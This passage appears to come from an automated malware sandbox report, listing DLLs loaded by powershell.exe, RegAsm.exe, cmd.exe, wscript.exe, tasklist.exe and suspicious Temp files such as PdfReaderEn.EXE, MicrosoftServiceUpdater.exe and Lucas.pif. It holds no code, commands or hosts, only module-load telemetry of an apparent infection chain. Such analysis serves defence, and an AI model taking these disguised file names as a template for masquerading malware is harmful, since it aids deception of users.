                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXESection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeSection loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeSection loaded: feclient.dll
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\MicrosoftServiceUpdater.exeSection loaded: advpack.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\603423\Lucas.pifSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
